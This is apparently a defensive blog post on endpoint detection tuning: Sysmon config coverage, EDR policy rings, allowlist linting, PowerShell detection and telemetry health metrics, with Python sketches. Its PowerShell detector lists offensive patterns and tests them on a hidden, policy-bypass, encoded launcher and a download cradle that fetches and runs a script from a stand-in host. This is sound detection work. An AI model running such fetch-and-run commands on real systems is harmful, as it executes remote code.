Endpoint Detection Tuning: Sysmon Config, EDR Policy, Allow-List Hygiene
Endpoint visibility is the highest-value SOC investment, and also the easiest to misconfigure into uselessness. A practical tour through Sysmon config tuning, EDR policy ladders, and allowlist hygiene that does not become an attacker's gift.
By Arjun Raghavan, Security & Systems Lead, BIPI · September 20, 2023 · 11 min read
Endpoint telemetry is where most modern detections live. T1059 (Command and Scripting Interpreter), T1003 (OS Credential Dumping), T1055 (Process Injection), T1547 (Boot or Logon Autostart Execution): none of them is reliably detectable without endpoint visibility. And yet most environments run Sysmon with a stale config from 2019 and EDR in monitor-only mode because somebody once had a false positive.
Sysmon Config as Code
Olaf Hartong's sysmon-modular and SwiftOnSecurity's sysmon-config remain the two reference configurations for production Sysmon deployments. Both are excellent starting points. Neither should be deployed unmodified. The right approach is to fork one, add environment-specific exclusions on your fork, keep the XML under version control, and deploy via GPO or your endpoint management tool, tagging each deployment with the config version so you can tell which endpoints run which revision.
- Event ID 1 process creation: required for nearly every behavioral detection, exclude only signed Microsoft binaries with no command line argument variation
- Event ID 3 network connection: high volume but essential for C2 detection, scope by destination port and process
- Event ID 7 image loaded: enables T1574 hijack execution flow detection, expensive but worth it for sensitive endpoints
- Event ID 10 process access: required for T1003.001 LSASS dumping detection, do not skip
- Event ID 11 file create: needed for staging and exfil detection, scope by directory
- Event ID 13 registry value set: enables persistence detection, focus on Run keys and image hijacks
- Event ID 22 DNS query: high volume, but invaluable for C2 hunting, retain at least 30 days
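A quick way to keep a forked config honest is to check in CI that it still addresses every event type in the list above. The following is a minimal sketch, assuming the standard Sysmon element names (`ProcessCreate`, `NetworkConnect`, `ImageLoad`, `ProcessAccess`, `FileCreate`, `RegistryEvent`, `DnsQuery`). The `SAMPLE` config, the `coverage` and `missing` helpers, and the idea of failing a build on missing elements are illustrative assumptions, not part of either reference configuration.

```python
import xml.etree.ElementTree as ET

# Sysmon config element name -> the event ID from the list above that it controls.
REQUIRED = {
    "ProcessCreate": 1,
    "NetworkConnect": 3,
    "ImageLoad": 7,
    "ProcessAccess": 10,
    "FileCreate": 11,
    "RegistryEvent": 13,  # RegistryEvent rules cover event IDs 12, 13 and 14
    "DnsQuery": 22,
}

# Hypothetical, deliberately incomplete config used only to exercise the check.
SAMPLE = r"""<Sysmon schemaversion="4.50">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="exclude"/>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <ProcessAccess onmatch="include">
        <TargetImage condition="is">C:\Windows\System32\lsass.exe</TargetImage>
      </ProcessAccess>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <DnsQuery onmatch="exclude"/>
    </RuleGroup>
  </EventFiltering>
</Sysmon>"""


def coverage(config_xml: str) -> dict:
    """Map each required element to the onmatch modes found ([] if absent)."""
    root = ET.fromstring(config_xml)
    found = {name: [] for name in REQUIRED}
    for elem in root.iter():
        if elem.tag in found:
            found[elem.tag].append(elem.get("onmatch", "unspecified"))
    return found


def missing(config_xml: str) -> list:
    """Return the event IDs whose rule element does not appear at all."""
    return sorted(
        REQUIRED[name] for name, modes in coverage(config_xml).items() if not modes
    )


if __name__ == "__main__":
    print(missing(SAMPLE))  # → [3, 7, 11, 13]
```

This only checks that an element is present. It says nothing about whether the include and exclude rules inside it are sensible, so treat it as a regression guard rather than a quality check.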
EDR Policy Ladders
EDR vendors all support a policy ladder from monitor to detect to block. The mistake is deploying every rule at the same level. Build at least three rings. Ring one: high-confidence, low-false-positive rules, such as those for T1003.001 LSASS dumping, run in block mode across the fleet. Ring two: medium-confidence rules run in detect mode with alerting. Ring three: experimental rules run in monitor mode with output to a hunting index. Promote rules between rings based on their measured false positive rate, not on vendor recommendation.
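Promotion by measured false positive rate can be made mechanical. The sketch below is one possible shape for that decision, not a vendor feature: the `RuleStats` record, the `PROMOTE_MAX_FP` thresholds, and the `MIN_ALERTS` sample floor are all hypothetical values chosen for illustration and should be replaced with numbers your own triage data supports.

```python
from dataclasses import dataclass

# Ordered from least to most disruptive: ring three, ring two, ring one.
RINGS = ["monitor", "detect", "block"]

# Hypothetical thresholds: highest false positive rate allowed to enter a ring.
PROMOTE_MAX_FP = {"detect": 0.10, "block": 0.01}

# Hypothetical floor: do not trust a rate computed from fewer alerts than this.
MIN_ALERTS = 50


@dataclass
class RuleStats:
    name: str
    ring: str             # current ring, one of RINGS
    alerts: int           # triaged alerts in the review window
    false_positives: int  # of those, how many were judged benign


def next_ring(rule: RuleStats) -> str:
    """Return the ring the rule should be in after this review."""
    idx = RINGS.index(rule.ring)
    if idx == len(RINGS) - 1 or rule.alerts < MIN_ALERTS:
        return rule.ring  # already blocking, or not enough evidence yet
    target = RINGS[idx + 1]
    fp_rate = rule.false_positives / rule.alerts
    return target if fp_rate <= PROMOTE_MAX_FP[target] else rule.ring


if __name__ == "__main__":
    print(next_ring(RuleStats("lsass-handle-open", "detect", 500, 2)))    # → block
    print(next_ring(RuleStats("office-spawns-shell", "detect", 200, 10)))  # → detect
```

The sketch only promotes one ring at a time and never demotes. A real review would also want a path back down when a blocking rule starts generating false positives.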
Common Allowlist Failures
- Allowlisting by filename: an attacker can drop a binary with the same name, especially in user-writable paths
- Allowlisting by path without signature check: any binary in C:\Temp can now run unscrutinized
- Allowlisting a signing certificate that is also used by widely available third party tools, including offensive ones
- Allowlisting remote execution tools like PsExec, WMI, or PowerShell remoting wholesale
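Several of these failures can be caught by linting the allowlist before it ships. The following sketch assumes a hypothetical export format in which each entry is a dictionary with optional `filename`, `path`, `signer`, `sha256`, and `scoped_to` keys. Real EDR products each have their own schema, so the field names, the `USER_WRITABLE_PREFIXES` tuple, and the `REMOTE_EXEC_TOOLS` set are assumptions to adapt.

```python
# Hypothetical list of path prefixes that ordinary users can write to.
USER_WRITABLE_PREFIXES = (
    "c:\\temp",
    "c:\\users\\",
    "c:\\programdata\\",
    "c:\\windows\\temp",
)

# Hypothetical list of binaries that should never be allowed without scoping.
REMOTE_EXEC_TOOLS = {"psexec.exe", "wmic.exe", "powershell.exe", "wsmprovhost.exe"}


def lint(entry: dict) -> list:
    """Return a list of findings for one allowlist entry (empty if clean)."""
    findings = []
    path = (entry.get("path") or "").lower()
    filename = (entry.get("filename") or "").lower()
    signer = entry.get("signer")
    file_hash = entry.get("sha256")

    if filename and not path and not signer and not file_hash:
        findings.append("filename-only match")
    if path and not signer and not file_hash:
        findings.append("path without signature or hash check")
    if path.startswith(USER_WRITABLE_PREFIXES):
        findings.append("user-writable path")
    if filename in REMOTE_EXEC_TOOLS and not entry.get("scoped_to"):
        findings.append("remote execution tool allowed wholesale")
    return findings


if __name__ == "__main__":
    print(lint({"filename": "updater.exe"}))
    print(lint({"path": "C:\\Temp\\"}))
    print(lint({"filename": "PsExec.exe", "signer": "Microsoft Corporation"}))
```

The shared signing certificate failure is not covered here, because detecting it needs a curated list of certificates known to sign dual-use tools, which has to come from your own threat intelligence.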
PowerShell Specifically
PowerShell is too valuable for administrators to block and too dangerous to ignore. The right configuration uses Constrained Language Mode on workstations, AMSI enabled, script block logging, module logging for the modules that matter, and transcript logging to a central share. Detections then run against event ID 4104 script block logs with rules targeting common offensive patterns: encoded commands, hidden-window flags, download cradle strings like Net.WebClient and DownloadString, and execution policy bypass.
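As a rough illustration of what such rules look like, the sketch below matches the four pattern families named above against the text of a script block. The regular expressions and the `match_script_block` helper are assumptions written for this example. They cover only a few common spellings of each flag, will miss obfuscated variants, and can produce false positives, so they belong in a hunting ring before anything stricter.

```python
import re

# Illustrative patterns only; each covers a handful of common spellings.
PATTERNS = {
    # -e / -ec / -enc / -EncodedCommand followed by a long base64-looking token
    "encoded_command": re.compile(
        r"(?<![\w-])-e(?:c|nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I
    ),
    # -w / -win / -WindowStyle hidden
    "hidden_window": re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden\b", re.I),
    # the two download cradle strings named in the text
    "download_cradle": re.compile(r"net\.webclient|downloadstring", re.I),
    # -ep / -exec / -ExecutionPolicy bypass
    "execution_policy_bypass": re.compile(
        r"-e(?:p|xec(?:utionpolicy)?)\s+bypass\b", re.I
    ),
}


def match_script_block(text: str) -> list:
    """Return the sorted names of every pattern family found in the text."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(text))


if __name__ == "__main__":
    launcher = (
        "powershell -NoP -W Hidden -Exec Bypass "
        "-Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
    )
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    benign = "Get-ChildItem -ErrorAction SilentlyContinue"
    for sample in (launcher, cradle, benign):
        print(match_script_block(sample))
```

In practice the input would be the script block text field of each 4104 event as exported by your log pipeline, and a hit would be enriched with host and user before it reaches an analyst.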
WDAC and AppLocker as Force Multipliers
Windows Defender Application Control and AppLocker, properly configured, prevent the execution of unsigned code in user-writable paths, which kills most living-off-the-land binary abuse and most T1027 obfuscated payload techniques. The deployment is genuinely hard and breaks legitimate use cases, so run it in audit mode for at least 90 days on a pilot ring before enforcement. The detection value of audit mode events alone is substantial.
EDR Tamper Protection
- Tamper protection must be enabled and tested by attempting to stop the EDR service from an elevated context
- Sysmon driver must be configured to prevent unloading except by authorized signed binaries
- Alerts must fire when EDR or Sysmon stops reporting from an endpoint, with a maximum threshold of five minutes
- A monthly audit should list endpoints whose telemetry has gaps, with reason and remediation owner
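The silence alert in the list above reduces to comparing each sensor's last-seen timestamp against the threshold. The sketch below shows that comparison. The `last_seen` mapping keyed by `(host, sensor)` and the `silent_sensors` helper are hypothetical; in a real deployment the timestamps would come from your SIEM or EDR console.

```python
from datetime import datetime, timedelta, timezone

# Five minutes, per the threshold stated in the list above.
SILENCE_THRESHOLD = timedelta(minutes=5)


def silent_sensors(last_seen: dict, now: datetime,
                   threshold: timedelta = SILENCE_THRESHOLD) -> list:
    """Return sorted (host, sensor) pairs silent for longer than the threshold."""
    return sorted(key for key, ts in last_seen.items() if now - ts > threshold)


if __name__ == "__main__":
    now = datetime(2023, 9, 20, 12, 0, tzinfo=timezone.utc)
    last_seen = {
        ("ws-01", "sysmon"): now - timedelta(minutes=2),
        ("ws-01", "edr"): now - timedelta(minutes=7),
        ("srv-02", "sysmon"): now - timedelta(minutes=5),
    }
    print(silent_sensors(last_seen, now))  # → [('ws-01', 'edr')]
```

Tracking Sysmon and the EDR agent separately matters: an endpoint where one sensor keeps reporting while the other goes quiet is a stronger tampering signal than a machine that is simply powered off.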
Endpoint visibility is asymmetric: it costs the SOC weeks to deploy and tune, and saves the SOC months when an actual incident lands. Anyone arguing for less visibility has not run a real IR.
Measurement
Track three numbers monthly. Percent of endpoints that reported Sysmon events in the last 24 hours, target above 98 percent. Percent of endpoints with EDR enforcing at least the ring one block policy, target 100 percent. Mean time between EDR agent failure and remediation, target under 48 hours. These three metrics, more than any detection count, predict whether the SOC will catch the next intrusion.
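These numbers are simple enough to compute from an inventory export. The following sketch assumes a hypothetical data shape: each endpoint record carries a `last_sysmon` timestamp (or `None`) and an `edr_enforcing` flag, and each failure record carries `failed` and `remediated` timestamps. None of these field names come from a specific product.

```python
from datetime import datetime, timedelta
from statistics import mean


def pct(part: int, whole: int) -> float:
    """Percentage rounded to one decimal place; 0.0 for an empty fleet."""
    return round(100.0 * part / whole, 1) if whole else 0.0


def monthly_metrics(endpoints: list, failures: list, now: datetime) -> dict:
    """Compute the three health metrics from inventory and failure records."""
    reporting = sum(
        1 for e in endpoints
        if e["last_sysmon"] is not None
        and now - e["last_sysmon"] <= timedelta(hours=24)
    )
    enforcing = sum(1 for e in endpoints if e["edr_enforcing"])
    # Only closed failures contribute to the mean; open ones need separate follow-up.
    hours = [
        (f["remediated"] - f["failed"]).total_seconds() / 3600
        for f in failures
        if f["remediated"] is not None
    ]
    return {
        "sysmon_reporting_pct": pct(reporting, len(endpoints)),
        "edr_enforcing_pct": pct(enforcing, len(endpoints)),
        "mean_hours_to_remediate": round(mean(hours), 1) if hours else None,
    }


if __name__ == "__main__":
    now = datetime(2023, 9, 20, 12, 0)
    endpoints = [
        {"last_sysmon": now - timedelta(hours=1), "edr_enforcing": True},
        {"last_sysmon": now - timedelta(hours=30), "edr_enforcing": True},
        {"last_sysmon": now - timedelta(hours=3), "edr_enforcing": False},
        {"last_sysmon": None, "edr_enforcing": False},
    ]
    failures = [
        {"failed": now - timedelta(hours=40), "remediated": now - timedelta(hours=28)},
        {"failed": now - timedelta(hours=50), "remediated": now - timedelta(hours=14)},
        {"failed": now - timedelta(hours=5), "remediated": None},
    ]
    print(monthly_metrics(endpoints, failures, now))
```

Because unremediated failures are excluded from the mean, a long-open failure will not move the third metric. Reporting the count of open failures alongside it avoids that blind spot.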